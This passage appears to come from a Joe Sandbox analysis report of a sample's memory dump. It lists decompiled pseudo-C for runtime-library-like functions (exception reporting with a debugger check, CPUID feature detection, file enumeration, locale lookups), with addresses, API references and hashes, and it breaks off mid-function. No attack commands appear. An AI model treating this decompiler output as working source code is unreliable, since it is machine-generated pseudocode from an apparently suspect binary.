				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x443048; // 0x35200185
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00413F8E(_t41);
					_pop(_t61);
				}
				E00415180(_t66,  &_v804, 0, 0x50);
				E00415180(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00413F8E(_t57);
				}
				return E0041361E(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00417e53
0x00417e53
0x00417e53
0x00417e5e
0x00417e63
0x00417e65
0x00417e6d
0x00417e6f
0x00417e72
0x00417e77
0x00417e77
0x00417e83
0x00417e96
0x00417ea4
0x00417eaa
0x00417eb0
0x00417eb6
0x00417ebc
0x00417ec2
0x00417ec8
0x00417ece
0x00417ed4
0x00417eda
0x00417ee1
0x00417ee8
0x00417eef
0x00417ef6
0x00417efd
0x00417f04
0x00417f05
0x00417f0e
0x00417f14
0x00417f17
0x00417f1d
0x00417f2a
0x00417f33
0x00417f3c
0x00417f45
0x00417f53
0x00417f55
0x00417f6a
0x00417f76
0x00417f79
0x00417f7e
0x00417f8b

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00417F4B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00417F55
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00417F62

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8ec714e12ae7b128a46a4408e36659fd50e9308bbddc07f0adf5f3c5ff48a332
Instruction ID: 0f1df055cd3c241758f2c3142034cd1ebe2107538da7602209f528a78068d6d9
Opcode Fuzzy Hash: 8ec714e12ae7b128a46a4408e36659fd50e9308bbddc07f0adf5f3c5ff48a332
Instruction Fuzzy Hash: A031B274941228ABCB21DF25D9897CDBBB8BF18311F5042EAE40CA7250EB749FC58F49

Uniqueness

Uniqueness Score: -1.00%

Function 00423431 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041F752,?,20001004,00000000,00000002,?,?,0041ED54), ref: 00423465

Strings

0'@, xrefs: 00423450

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: InfoLocale
String ID: 0'@
API String ID: 2299586839-1999884151
Opcode ID: c8229f7746bc158f5fbe8b296d7951ade04d501f6ec7cd96f2d52353943caad9
Instruction ID: 26994373bb32126ae1ee7594069622b97e7e651582fef90fa22001185f41c7fd
Opcode Fuzzy Hash: c8229f7746bc158f5fbe8b296d7951ade04d501f6ec7cd96f2d52353943caad9
Instruction Fuzzy Hash: F9E04F31600528BBCF132F62EC05A9E7F36EF44B63F444426FD0566221CB7D8F21AA99

Uniqueness

Uniqueness Score: -1.00%

Function 00413A75 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00413A75(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x444464 =  *0x444464 & 0x00000000;
				 *0x443050 =  *0x443050 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x444468; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x444468 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x443050; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x444464 = 1;
					 *0x443050 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x444464 = 2;
						 *0x443050 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x443050; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x444464 = 3;
								 *0x443050 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x444464 = 5;
									 *0x443050 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x443050 =  *0x443050 | 0x00000040;
										 *0x444464 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x444468; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x444468 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00413a75
0x00413a78
0x00413a82
0x00413a93
0x00413c45
0x00413c48
0x00413c48
0x00413a99
0x00413a9f
0x00413aa4
0x00413aa8
0x00413aac
0x00413aae
0x00413ab0
0x00413ab3
0x00413ab8
0x00413ac1
0x00413ad2
0x00413add
0x00413ae3
0x00413ae4
0x00413aea
0x00413aed
0x00413af7
0x00413afa
0x00413afd
0x00413b00
0x00413b45
0x00413b45
0x00413b4b
0x00413b4b
0x00413b50
0x00413b51
0x00413b57
0x00413b89
0x00413b59
0x00413b5b
0x00413b5c
0x00413b62
0x00413b65
0x00413b67
0x00413b6a
0x00413b6d
0x00413b70
0x00413b73
0x00413b7c
0x00413b81
0x00413b81
0x00413b7c
0x00413b8c
0x00413b91
0x00413b94
0x00413b9e
0x00413ba9
0x00413baf
0x00413bb2
0x00413bbc
0x00413bc7
0x00413bd3
0x00413bd6
0x00413bd9
0x00413be4
0x00413be9
0x00413beb
0x00413bf0
0x00413bf3
0x00413bfd
0x00413c05
0x00413c0a
0x00413c14
0x00413c22
0x00413c35
0x00413c3c
0x00413c3c
0x00413c22
0x00413c05
0x00413be9
0x00413bc7
0x00000000
0x00413c44
0x00413b05
0x00413b0f
0x00413b34
0x00413b3a
0x00413b3d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00413A8B

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: f12052dfdf4eec6d4ee5c056bec4c25f9eef27489052af0526b3fceb88185073
Instruction ID: 672423d78a880ab3ac9c4519d5476871742042cf14ee69d1d4eb3a8e2a1c8a8d
Opcode Fuzzy Hash: f12052dfdf4eec6d4ee5c056bec4c25f9eef27489052af0526b3fceb88185073
Instruction Fuzzy Hash: 48519EB5901605CFEB18CF58D9827AEBBF4FB85711F14816AC405EB355E378AA80CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00428390 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00428390(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				void* _v612;
				signed int _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				char _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				union _FINDEX_INFO_LEVELS _v656;
				char _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t72;
				signed int _t77;
				signed int _t79;
				char _t81;
				signed char _t82;
				signed int _t88;
				signed int _t94;
				signed int _t100;
				signed int _t103;
				signed int _t104;
				signed int _t106;
				intOrPtr* _t112;
				signed int _t115;
				intOrPtr _t125;
				signed int _t127;
				signed int _t130;
				signed int _t132;
				void* _t135;
				void* _t137;
				intOrPtr _t139;
				intOrPtr* _t142;
				signed int _t144;
				void* _t146;
				intOrPtr* _t147;
				signed int _t156;
				void* _t164;
				signed int _t167;
				intOrPtr _t169;
				void* _t170;
				void* _t173;
				void* _t174;
				void* _t175;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				void* _t181;
				signed int _t182;
				void* _t183;
				void* _t184;

				_push(__ecx);
				_t142 = _a4;
				_t2 = _t142 + 1; // 0x1
				_t164 = _t2;
				do {
					_t72 =  *_t142;
					_t142 = _t142 + 1;
				} while (_t72 != 0);
				_t167 = _a12;
				_t144 = _t142 - _t164 + 1;
				_v8 = _t144;
				if(_t144 <=  !_t167) {
					_t5 = _t167 + 1; // 0x1
					_t135 = _t5 + _t144;
					_t174 = E00420CEC(_t135, 1);
					_t146 = _t173;
					__eflags = _t167;
					if(_t167 == 0) {
						L7:
						_push(_v8);
						_t135 = _t135 - _t167;
						_t77 = E0042EB08(_t146, _t174 + _t167, _t135, _a4);
						_t182 = _t181 + 0x10;
						__eflags = _t77;
						if(_t77 != 0) {
							goto L12;
						} else {
							_t139 = _a16;
							_t127 = E0042872B(_t139);
							_v8 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								 *( *(_t139 + 4)) = _t174;
								_t177 = 0;
								_t14 = _t139 + 4;
								 *_t14 =  *(_t139 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E00421955(_t174);
								_t177 = _v8;
							}
							E00421955(0);
							_t130 = _t177;
							goto L4;
						}
					} else {
						_push(_t167);
						_t132 = E0042EB08(_t146, _t174, _t135, _a8);
						_t182 = _t181 + 0x10;
						__eflags = _t132;
						if(_t132 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0041807C();
							asm("int3");
							_t180 = _t182;
							_t183 = _t182 - 0x298;
							_t79 =  *0x443048; // 0x35200185
							_v48 = _t79 ^ _t180;
							_t147 = _v32;
							_t165 = _v28;
							_push(_t135);
							_push(0);
							_t169 = _v36;
							_v648 = _t165;
							__eflags = _t147 - _t169;
							if(_t147 != _t169) {
								while(1) {
									_t125 =  *_t147;
									__eflags = _t125 - 0x2f;
									if(_t125 == 0x2f) {
										break;
									}
									__eflags = _t125 - 0x5c;
									if(_t125 != 0x5c) {
										__eflags = _t125 - 0x3a;
										if(_t125 != 0x3a) {
											_t147 = E0042F9C0(_t169, _t147);
											__eflags = _t147 - _t169;
											if(_t147 != _t169) {
												continue;
											}
										}
									}
									break;
								}
								_t165 = _v612;
							}
							_t81 =  *_t147;
							_v605 = _t81;
							__eflags = _t81 - 0x3a;
							if(_t81 != 0x3a) {
								L23:
								__eflags = _t81 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t82 = 1;
								} else {
									__eflags = _t81 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t81 - 0x3a;
										_t82 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v660 = 0;
								_v656 = 0;
								_push(_t174);
								asm("sbb eax, eax");
								_v652 = 0;
								_v648 = 0;
								_v664 =  ~(_t82 & 0x000000ff) & _t147 - _t169 + 0x00000001;
								_v644 = 0;
								_v640 = 0;
								_t88 = E0041D39D(_t147 - _t169 + 1, _t169,  &_v660, E00427F9A(_t165, __eflags));
								_t184 = _t183 + 0xc;
								asm("sbb eax, eax");
								_t175 = FindFirstFileExW( !( ~_t88) & _v652, 0,  &_v604, 0, 0, 0);
								__eflags = _t175 - 0xffffffff;
								if(_t175 != 0xffffffff) {
									_t151 = _v612;
									_t94 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t94;
									_v668 = _t94 >> 2;
									do {
										_v636 = 0;
										_v632 = 0;
										_v628 = 0;
										_v624 = 0;
										_v620 = 0;
										_v616 = 0;
										_t100 = E0042814D( &(_v604.cFileName),  &_v636,  &_v605, E00427F9A(_t165, __eflags));
										_t184 = _t184 + 0x10;
										asm("sbb eax, eax");
										_t103 =  !( ~_t100) & _v628;
										__eflags =  *_t103 - 0x2e;
										if( *_t103 != 0x2e) {
											L36:
											_push(_v612);
											_t104 = E00428390(_t151, _t103, _t169, _v664);
											_t184 = _t184 + 0x10;
											_v672 = _t104;
											__eflags = _t104;
											if(_t104 != 0) {
												__eflags = _v616;
												if(_v616 != 0) {
													E00421955(_v628);
												}
												FindClose(_t175);
												__eflags = _v640;
												if(_v640 != 0) {
													E00421955(_v652);
												}
												_t106 = _v672;
											} else {
												goto L37;
											}
										} else {
											_t151 =  *((intOrPtr*)(_t103 + 1));
											__eflags = _t151;
											if(_t151 == 0) {
												goto L37;
											} else {
												__eflags = _t151 - 0x2e;
												if(_t151 != 0x2e) {
													goto L36;
												} else {
													__eflags =  *(_t103 + 2);
													if( *(_t103 + 2) == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L50;
										L37:
										__eflags = _v616;
										if(_v616 != 0) {
											E00421955(_v628);
											_pop(_t151);
										}
										__eflags = FindNextFileW(_t175,  &_v604);
									} while (__eflags != 0);
									_t112 = _v612;
									_t156 = _v668;
									_t165 =  *_t112;
									_t115 =  *((intOrPtr*)(_t112 + 4)) -  *_t112 >> 2;
									__eflags = _t156 - _t115;
									if(_t156 != _t115) {
										__eflags = _t115 - _t156;
										E0042F490(_t165, _t165 + _t156 * 4, _t115 - _t156, 4, E00428135);
									}
									FindClose(_t175);
									__eflags = _v640;
									if(_v640 != 0) {
										E00421955(_v652);
									}
									_t106 = 0;
								} else {
									_push(_v612);
									_t176 = E00428390( &_v604, _t169, 0, 0);
									__eflags = _v640;
									if(_v640 != 0) {
										E00421955(_v652);
									}
									_t106 = _t176;
								}
								L50:
								_pop(_t174);
							} else {
								__eflags = _t147 - _t169 + 1;
								if(_t147 == _t169 + 1) {
									_t81 = _v605;
									goto L23;
								} else {
									_push(_t165);
									_t106 = E00428390(_t147, _t169, 0, 0);
								}
							}
							_pop(_t170);
							__eflags = _v12 ^ _t180;
							_pop(_t137);
							return E0041361E(_t106, _t137, _v12 ^ _t180, _t165, _t170, _t174);
						} else {
							goto L7;
						}
					}
				} else {
					_t130 = 0xc;
					L4:
					return _t130;
				}
			}

0x00428395
0x00428396
0x00428399
0x00428399
0x0042839c
0x0042839c
0x0042839e
0x0042839f
0x004283a4
0x004283ab
0x004283ae
0x004283b3
0x004283bd
0x004283c0
0x004283ca
0x004283cd
0x004283ce
0x004283d0
0x004283e4
0x004283e4
0x004283e7
0x004283f1
0x004283f6
0x004283f9
0x004283fb
0x00000000
0x004283fd
0x004283fd
0x00428402
0x00428409
0x0042840c
0x0042840e
0x0042841f
0x00428421
0x00428423
0x00428423
0x00428423
0x00428410
0x00428411
0x00428416
0x00428419
0x00428428
0x0042842e
0x00000000
0x00428431
0x004283d2
0x004283d2
0x004283d8
0x004283dd
0x004283e0
0x004283e2
0x00428434
0x00428436
0x00428437
0x00428438
0x00428439
0x0042843a
0x0042843b
0x00428440
0x00428444
0x00428446
0x0042844c
0x00428453
0x00428456
0x00428459
0x0042845c
0x0042845d
0x0042845e
0x00428461
0x00428467
0x00428469
0x0042846b
0x0042846b
0x0042846d
0x0042846f
0x00000000
0x00000000
0x00428471
0x00428473
0x00428475
0x00428477
0x00428482
0x00428484
0x00428486
0x00000000
0x00000000
0x00428486
0x00428477
0x00000000
0x00428473
0x00428488
0x00428488
0x0042848e
0x00428490
0x00428496
0x00428498
0x004284ba
0x004284bc
0x004284be
0x004284ca
0x004284ca
0x004284c0
0x004284c0
0x004284c2
0x00000000
0x004284c4
0x004284c4
0x004284c6
0x004284c8
0x00000000
0x00000000
0x004284c8
0x004284c2
0x004284d2
0x004284da
0x004284e0
0x004284e1
0x004284e3
0x004284eb
0x004284f1
0x004284f7
0x004284fd
0x00428511
0x00428516
0x00428521
0x00428537
0x00428539
0x0042853c
0x0042856c
0x00428575
0x00428575
0x0042857a
0x00428580
0x00428580
0x00428586
0x0042858c
0x00428592
0x00428598
0x0042859e
0x004285bf
0x004285c4
0x004285c9
0x004285cd
0x004285d3
0x004285d6
0x004285e9
0x004285e9
0x004285f7
0x004285fc
0x004285ff
0x00428605
0x00428607
0x00428682
0x00428688
0x00428690
0x00428695
0x00428697
0x0042869d
0x004286a3
0x004286ab
0x004286b0
0x004286b1
0x00000000
0x00000000
0x00000000
0x004285d8
0x004285d8
0x004285db
0x004285dd
0x00000000
0x004285df
0x004285df
0x004285e2
0x00000000
0x004285e4
0x004285e4
0x004285e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004285e7
0x004285e2
0x004285dd
0x00000000
0x00428609
0x00428609
0x0042860f
0x00428617
0x0042861c
0x0042861c
0x0042862b
0x0042862b
0x00428633
0x00428639
0x0042863f
0x00428646
0x00428649
0x0042864b
0x00428652
0x0042865b
0x00428660
0x00428664
0x0042866a
0x00428670
0x00428678
0x0042867d
0x0042867e
0x0042853e
0x0042853e
0x0042854f
0x00428551
0x00428557
0x0042855f
0x00428564
0x00428565
0x00428565
0x004286b7
0x004286b7
0x0042849a
0x0042849d
0x0042849f
0x004284b4
0x00000000
0x004284a1
0x004284a1
0x004284a7
0x004284ac
0x0042849f
0x004286bb
0x004286bc
0x004286be
0x004286c5
0x00000000
0x00000000
0x00000000
0x004283e2
0x004283b5
0x004283b7
0x004283b8
0x004283ba
0x004283ba

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2851c78cb641dc8751c87f22a5c31f2ec5344f90778a4143148a6754006df4a
Instruction ID: d2a889c4e4ab22da45b13c231c901af6bbb2b415ccc49b1eaa155dbaf1fc4cc7
Opcode Fuzzy Hash: a2851c78cb641dc8751c87f22a5c31f2ec5344f90778a4143148a6754006df4a
Instruction Fuzzy Hash: 0B41A6B5905229AFDB10DF69DC89AAEBBB8AF45304F5442DEE40CD3201DA359E858F14

Uniqueness

Uniqueness Score: -1.00%

Function 0042B74F Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0042B74F(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				void* _t23;
				void* _t30;
				void* _t32;
				signed int _t41;
				signed int* _t47;
				int _t49;
				signed int _t50;

				_t46 = __edx;
				_t15 =  *0x443048; // 0x35200185
				_v8 = _t15 ^ _t50;
				_t48 = _a4;
				_t32 = E00420590(__ecx, __edx, _a4);
				_t47 =  *(E00420590(__ecx, __edx, _a4) + 0x34c);
				_t49 = E0042B824(_t48);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E00427E64(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
					_t41 =  *(_t32 + 0x60);
					if(_t23 != 0) {
						if(_t41 == 0 &&  *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
							_t30 = E00427E64(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
							if(_t30 == 0) {
								_push(_t47);
								_push(_t30);
								goto L9;
							}
						}
					} else {
						if(_t41 != 0) {
							L10:
							 *_t47 =  *_t47 | 0x00000004;
							_t47[1] = _t49;
							_t47[2] = _t49;
						} else {
							_push(_t47);
							_push(1);
							L9:
							_push(_t49);
							if(E0042B97E() != 0) {
								goto L10;
							}
						}
					}
					_t27 =  !( *_t47 >> 2) & 0x00000001;
				} else {
					 *_t47 =  *_t47 & _t21;
					_t27 = _t21 + 1;
				}
				return E0041361E(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
			}

0x0042b74f
0x0042b75a
0x0042b761
0x0042b766
0x0042b76f
0x0042b777
0x0042b786
0x0042b792
0x0042b7a3
0x0042b7ab
0x0042b7bc
0x0042b7c3
0x0042b7c8
0x0042b7d5
0x0042b7e6
0x0042b7ef
0x0042b7f1
0x0042b7f2
0x00000000
0x0042b7f2
0x0042b7ef
0x0042b7ca
0x0042b7cc
0x0042b800
0x0042b800
0x0042b803
0x0042b806
0x0042b7ce
0x0042b7ce
0x0042b7cf
0x0042b7f3
0x0042b7f3
0x0042b7fe
0x00000000
0x00000000
0x0042b7fe
0x0042b7cc
0x0042b810
0x0042b7ad
0x0042b7ad
0x0042b7af
0x0042b7af
0x0042b821

APIs

Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042B7A3

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 7463fdf6539469b88c41cb582bb761eb88bd5e67252c2e06de94d6500565ebf3
Instruction ID: 0ac6a602e87faf57b924cd42c56e0df9e0fe7f879a3993de3b265791f1f33201
Opcode Fuzzy Hash: 7463fdf6539469b88c41cb582bb761eb88bd5e67252c2e06de94d6500565ebf3
Instruction Fuzzy Hash: 2E21A171711226ABDB28AF15EC42A7B73ACEF54714F54407FE905C6241EB38ED40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0042B3D6 Relevance: 1.6, APIs: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0042B3D6(void* __ecx, void* __edx, signed int* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E00420590(__ecx, __edx, _t53);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t54 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t54 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t47 = E0042B4D0( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E0042B4FC, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}

0x0042b3e3
0x0042b3e9
0x0042b3ea
0x0042b3ed
0x0042b3f0
0x0042b3f0
0x0042b3f3
0x0042b3f5
0x0042b403
0x0042b409
0x0042b40c
0x0042b40f
0x0042b40f
0x0042b412
0x0042b414
0x0042b41d
0x0042b428
0x0042b42b
0x0042b431
0x0042b43c
0x0042b43c
0x0042b445
0x0042b448
0x0042b450
0x0042b456
0x0042b45a
0x0042b45f
0x0042b463
0x0042b468
0x0042b46a
0x00000000
0x0042b46a
0x0042b470

APIs

Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636

EnumSystemLocalesW.KERNEL32(0042B4FC,00000001,00000000,?,-00000050,?,0042BB2D,00000000,?,?,?,00000055,?), ref: 0042B448

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4a42c23b6a449a19ce65b80664115526c9ad1ab6432036e31bfaa55824555ee3
Instruction ID: 43a386682e75942e12222d4ef1c629f9c915ec6b6c4ff2abf4f6728031839f98
Opcode Fuzzy Hash: 4a42c23b6a449a19ce65b80664115526c9ad1ab6432036e31bfaa55824555ee3
Instruction Fuzzy Hash: 1E1129363007055FDB18AF39D8D157BB791FF80358B54442EE94687B42D375B942CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0042B97E Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0042B97E(signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t25;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_push(_t25);
				_t8 = E00420590(_t15, _t21, _t25);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
